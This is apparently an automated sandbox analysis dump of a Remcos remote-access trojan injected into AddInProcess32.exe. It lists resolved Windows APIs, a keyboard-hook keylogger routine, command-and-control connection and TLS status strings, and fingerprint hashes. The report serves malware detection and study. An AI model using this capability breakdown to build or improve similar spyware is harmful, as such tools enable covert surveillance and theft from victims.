48077 40491e 48074->48077 48075 404a40 48213 4052fd 28 API calls 48075->48213 48079 402093 28 API calls 48076->48079 48080 41b580 80 API calls 48077->48080 48084 404a8f 48079->48084 48080->48085 48089 402093 28 API calls 48082->48089 48209 421ad1 54 API calls 48083->48209 48090 41b580 80 API calls 48084->48090 48207 420cf1 27 API calls 48085->48207 48093 40495f 48089->48093 48090->48062 48091 40498f 48094 4049c4 48091->48094 48095 404994 48091->48095 48097 402093 28 API calls 48093->48097 48211 420e97 28 API calls 48094->48211 48098 402093 28 API calls 48095->48098 48100 40496e 48097->48100 48102 4049a3 48098->48102 48103 41b580 80 API calls 48100->48103 48105 402093 28 API calls 48102->48105 48106 404973 48103->48106 48104 4049cc 48107 4049f9 CreateEventW CreateEventW 48104->48107 48109 402093 28 API calls 48104->48109 48108 4049b2 48105->48108 48208 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48106->48208 48107->48062 48111 41b580 80 API calls 48108->48111 48110 4049e2 48109->48110 48113 402093 28 API calls 48110->48113 48114 4049b7 48111->48114 48115 4049f1 48113->48115 48210 421143 52 API calls 48114->48210 48117 41b580 80 API calls 48115->48117 48118 4049f6 48117->48118 48118->48107 48214 41b847 GlobalMemoryStatusEx 48119->48214 48121 41b886 48121->47322 48215 4145bb 48122->48215 48126 40dde0 48125->48126 48127 41353a 3 API calls 48126->48127 48129 40dde7 48127->48129 48128 40ddff 48128->47322 48129->48128 48130 413584 3 API calls 48129->48130 48130->48128 48132 4020b7 28 API calls 48131->48132 48133 41bce8 48132->48133 48133->47322 48135 41bb8d GetTickCount 48134->48135 48135->47322 48137 436f10 ___scrt_fastfail 48136->48137 48138 41bb46 GetForegroundWindow GetWindowTextW 48137->48138 48139 40417e 28 API calls 48138->48139 48140 41bb70 48139->48140 48140->47322 48142 402093 28 API calls 48141->48142 48143 40f931 48142->48143 48143->47322 48145 4020df 11 API calls 48144->48145 48146 402f3d 48145->48146 48147 4032a0 28 API calls 
48146->48147 48148 402f59 48147->48148 48148->47322 48150 404ab4 48149->48150 48245 40520c 48150->48245 48152 404ac9 ctype 48153 404b40 WaitForSingleObject 48152->48153 48154 404b20 48152->48154 48156 404b56 48153->48156 48155 404b32 send 48154->48155 48157 404b7b 48155->48157 48251 4210cb 54 API calls 48156->48251 48160 401fd8 11 API calls 48157->48160 48159 404b69 SetEvent 48159->48157 48161 404b83 48160->48161 48162 401fd8 11 API calls 48161->48162 48163 404b8b 48162->48163 48163->47322 48165 4020df 11 API calls 48164->48165 48166 404c27 48165->48166 48167 4020df 11 API calls 48166->48167 48173 404c30 48167->48173 48168 43bda0 new 21 API calls 48168->48173 48170 4020b7 28 API calls 48170->48173 48171 401fe2 28 API calls 48171->48173 48172 404ca1 48174 404e26 99 API calls 48172->48174 48173->48168 48173->48170 48173->48171 48173->48172 48175 401fd8 11 API calls 48173->48175 48181 404c84 48173->48181 48269 404b96 48173->48269 48176 404ca8 48174->48176 48175->48173 48177 401fd8 11 API calls 48176->48177 48178 404cb1 48177->48178 48179 401fd8 11 API calls 48178->48179 48180 404cba 48179->48180 48180->47322 48275 404cc3 32 API calls 48181->48275 48184 404e40 SetEvent CloseHandle 48183->48184 48185 404e57 closesocket 48183->48185 48186 404ed8 48184->48186 48187 404e64 48185->48187 48186->47322 48188 404e7a 48187->48188 48277 4050e4 84 API calls 48187->48277 48190 404e8c WaitForSingleObject 48188->48190 48191 404ece SetEvent CloseHandle 48188->48191 48278 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48190->48278 48191->48186 48193 404e9b SetEvent WaitForSingleObject 48279 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48193->48279 48195 404eb3 SetEvent CloseHandle CloseHandle 48195->48191 48196->47322 48197->47322 48199->47322 48200->48036 48201->48043 48206 40515c 102 API calls 48203->48206 48205 405159 48206->48205 48207->48069 48208->48062 48209->48091 48210->48106 48211->48104 48212->48075 48214->48121 48218 41458e 
48215->48218 48219 4145a3 ___scrt_initialize_default_local_stdio_options 48218->48219 48222 43f7ed 48219->48222 48225 43c540 48222->48225 48226 43c580 48225->48226 48227 43c568 48225->48227 48226->48227 48228 43c588 48226->48228 48240 44062d 20 API calls _Atexit 48227->48240 48241 43a837 36 API calls 3 library calls 48228->48241 48231 43c598 48242 43ccc6 20 API calls 2 library calls 48231->48242 48232 43c56d __cftoe 48233 43502b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48232->48233 48235 4145b1 48233->48235 48235->47322 48236 43c610 48243 43d334 51 API calls 3 library calls 48236->48243 48239 43c61b 48244 43cd30 20 API calls _free 48239->48244 48240->48232 48241->48231 48242->48236 48243->48239 48244->48232 48246 405214 48245->48246 48247 4023ce 11 API calls 48246->48247 48248 40521f 48247->48248 48252 405234 48248->48252 48250 40522e 48250->48152 48251->48159 48253 405240 48252->48253 48254 40526e 48252->48254 48256 4028e8 28 API calls 48253->48256 48268 4028a4 22 API calls 48254->48268 48258 40524a 48256->48258 48258->48250 48270 404ba0 WaitForSingleObject 48269->48270 48271 404bcd recv 48269->48271 48276 421107 54 API calls 48270->48276 48273 404be0 48271->48273 48273->48173 48274 404bbc SetEvent 48274->48273 48275->48173 48276->48274 48277->48188 48278->48193 48279->48195 48281->47386 48282->47412 48283->47411 48284->47400 48285->47404 48286->47410 48287->47443 48292 40f7fd 48290->48292 48291 413584 3 API calls 48291->48292 48292->48291 48293 40f8a1 48292->48293 48296 40f891 Sleep 48292->48296 48297 40f82f 48292->48297 48295 409097 28 API calls 48293->48295 48294 409097 28 API calls 48294->48297 48299 40f8ac 48295->48299 48296->48292 48297->48294 48297->48296 48298 41bcef 28 API calls 48297->48298 48305 401f09 11 API calls 48297->48305 48308 402093 28 API calls 48297->48308 48312 4137aa 14 API calls 48297->48312 48323 40d0d1 112 API calls ___scrt_fastfail 48297->48323 48324 41384f 14 API calls 48297->48324 48298->48297 48301 41bcef 28 
API calls 48299->48301 48302 40f8b8 48301->48302 48325 41384f 14 API calls 48302->48325 48305->48297 48306 40f8cb 48307 401f09 11 API calls 48306->48307 48309 40f8d7 48307->48309 48308->48297 48310 402093 28 API calls 48309->48310 48311 40f8e8 48310->48311 48313 4137aa 14 API calls 48311->48313 48312->48297 48314 40f8fb 48313->48314 48326 41288b TerminateProcess WaitForSingleObject 48314->48326 48316 40f903 ExitProcess 48327 412829 62 API calls 48317->48327 48324->48297 48325->48306 48326->48316 48328 40165e 48329 401666 48328->48329 48330 401669 48328->48330 48331 4016a8 48330->48331 48333 401696 48330->48333 48332 43455e new 22 API calls 48331->48332 48334 40169c 48332->48334 48335 43455e new 22 API calls 48333->48335 48335->48334

Control-flow Graph

APIs
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
• GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
• GetProcAddress.KERNEL32(00000000), ref: 0041CC19
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
• GetProcAddress.KERNEL32(00000000), ref: 0041CC42
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
• GetProcAddress.KERNEL32(00000000), ref: 0041CC57
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
• GetProcAddress.KERNEL32(00000000), ref: 0041CC66
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
• GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
• GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
• GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
• GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
• GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
• GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
• GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
• GetProcAddress.KERNEL32(00000000), ref: 0041CD06
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
• GetProcAddress.KERNEL32(00000000), ref: 0041CD17
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
• GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
• GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
• GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD60
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
• GetProcAddress.KERNEL32(00000000), ref: 0041CD70
• GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
• GetProcAddress.KERNEL32(00000000), ref: 0041CD84
• GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
• GetProcAddress.KERNEL32(00000000), ref: 0041CD98
• LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
• LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
• GetProcAddress.KERNEL32(00000000), ref: 0041CDDD

Strings

Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Yara matches

Similarity
• API ID: AddressProc$LibraryLoad$HandleModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 4236061018-3687161714
• Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
• Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
• Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
• Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                                                                                Control-flow Graph
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                • Opcode ID: 5fde2b34a4504e6eea0d3b4781e0e866905567e75789e5425b76f48977b00625
                                                                                                • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                • Opcode Fuzzy Hash: 5fde2b34a4504e6eea0d3b4781e0e866905567e75789e5425b76f48977b00625
                                                                                                • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
                                                                                                  • Part of subcall function 00413584: RegCloseKey.KERNELBASE(?), ref: 004135CD
                                                                                                • Sleep.KERNELBASE(00000BB8), ref: 0040F896
                                                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                • String ID: 5.2.0 Pro$override$pth_unenc$RG
                                                                                                • API String ID: 2281282204-1448307011
                                                                                                • Opcode ID: 1af1d5829739cdfae1d7ec60a3919f213ddc3876d94f720482a9bc216ddd3272
                                                                                                • Instruction ID: 0454f1d730b8de97e77b6af0221289a353f5645d6d0bcfbcd4472c6607f37e61
                                                                                                • Opcode Fuzzy Hash: 1af1d5829739cdfae1d7ec60a3919f213ddc3876d94f720482a9bc216ddd3272
                                                                                                • Instruction Fuzzy Hash: 7421E171B0420127D6087676885B6AE399A9B80708F50453FF409672D6FF7C8E0483AF

                                                                                                Control-flow Graph
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                Strings
                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$EventLocalThreadTime
                                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 2532271599-1507639952
                                                                                                • Opcode ID: 14a91583b2d264a5addeb1b7c1dbb9be3becf486bbdda4e77342a8b9c593ad2f
                                                                                                • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                • Opcode Fuzzy Hash: 14a91583b2d264a5addeb1b7c1dbb9be3becf486bbdda4e77342a8b9c593ad2f
                                                                                                • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00474F08,00404C49,00000000,?,?,?,00474F08,?), ref: 00404BA5
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitrecv
                                                                                                • String ID:
                                                                                                • API String ID: 311754179-0
                                                                                                • Opcode ID: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                                                                • Instruction ID: 0899ded2458b7d4720508400fe02e5f5257555b40415190a6d7bc1514cf1b529
                                                                                                • Opcode Fuzzy Hash: cdb06e8163b8322063f134be74ce7e1cf20e247c26aa7992d3e9e0113c183a83
                                                                                                • Instruction Fuzzy Hash: 53F05E36108212FFC7019F10EC09E0AFB62FB85721F10862AF510512B08771FC20DB95
                                                                                                APIs
                                                                                                • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,004750F4), ref: 0041B6BB
                                                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Name$ComputerUser
                                                                                                • String ID:
                                                                                                • API String ID: 4229901323-0
                                                                                                • Opcode ID: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                • Instruction ID: 96a0ba9ffe47efa01ac310f3847ceb2d7b3b0148e4494d8e74ae155582b6cc75
                                                                                                • Opcode Fuzzy Hash: a649893464b8dc9f92fcf892b6f773fc4b962ecf36c796a43829c604b32fbd1e
                                                                                                • Instruction Fuzzy Hash: 9E014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E888BA8
                                                                                                APIs
                                                                                                • GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EF0,00475A10,00474EF0,00000000,00474EF0,00000000,00474EF0,5.2.0 Pro), ref: 0040F920
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID:
                                                                                                • API String ID: 2299586839-0
                                                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                                                Control-flow Graph
                                                                                                APIs
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040EA29
                                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                • String ID: (TG$0SG$0SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$HSG$HSG$Inj$Remcos Agent initialized$Software\$User$`SG$del$del$exepath$licence$license_code.txt$tMG$RG$RG$RG$RG$RG
                                                                                                • API String ID: 2830904901-655123086
                                                                                                • Opcode ID: 028ef4fbd8a9c70fb27beb0cb4579416cf0a642db9cc0ded8a55f065ea43d688
                                                                                                • Instruction ID: 744eeac4272eceb7f63ef51a6efbfa797c3f505d1bd04c543663c5f487e0f2b9
                                                                                                • Opcode Fuzzy Hash: 028ef4fbd8a9c70fb27beb0cb4579416cf0a642db9cc0ded8a55f065ea43d688
                                                                                                • Instruction Fuzzy Hash: 7D32D860B043416BDA14B7729C57B6E26994F80748F40483FB9467F2E3EEBD8D45839E

                                                                                                Control-flow Graph

                                                                                                 (graph image not captured; basic blocks 414f65 through 415b20, API nodes: Sleep, WSAGetLastError, GetTickCount, CreateThread)
                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000,00000029,00475300,004750F4,00000000), ref: 00414FB6
                                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                                • Sleep.KERNELBASE(00000000,00000002), ref: 00415B12
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                                • String ID: | $%I64u$5.2.0 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$HSG$TLS Off$TLS On $`SG$hlight$name$tMG$RG
                                                                                                • API String ID: 524882891-382842652
                                                                                                • Opcode ID: 271b0cbc9598d3a17c324926429737543c5586e256268ea2e4bd51e566f127eb
                                                                                                • Instruction ID: d8c825886b0a0d8326cbfb5c9d4cc5050fd80dde9ad4bcb2ea62c87b00a1b781
                                                                                                • Opcode Fuzzy Hash: 271b0cbc9598d3a17c324926429737543c5586e256268ea2e4bd51e566f127eb
                                                                                                • Instruction Fuzzy Hash: 03526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                                • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 213583cefde537503fd6ad8566cb64c1784dcb87914e3c10d304950ab1e6b0a8
                                                                                                • Instruction ID: d7ad8a6a5323ad03425d5def7d05b30a9c8ce31cd4ccd690c712fe6c843f15aa
                                                                                                • Opcode Fuzzy Hash: 213583cefde537503fd6ad8566cb64c1784dcb87914e3c10d304950ab1e6b0a8
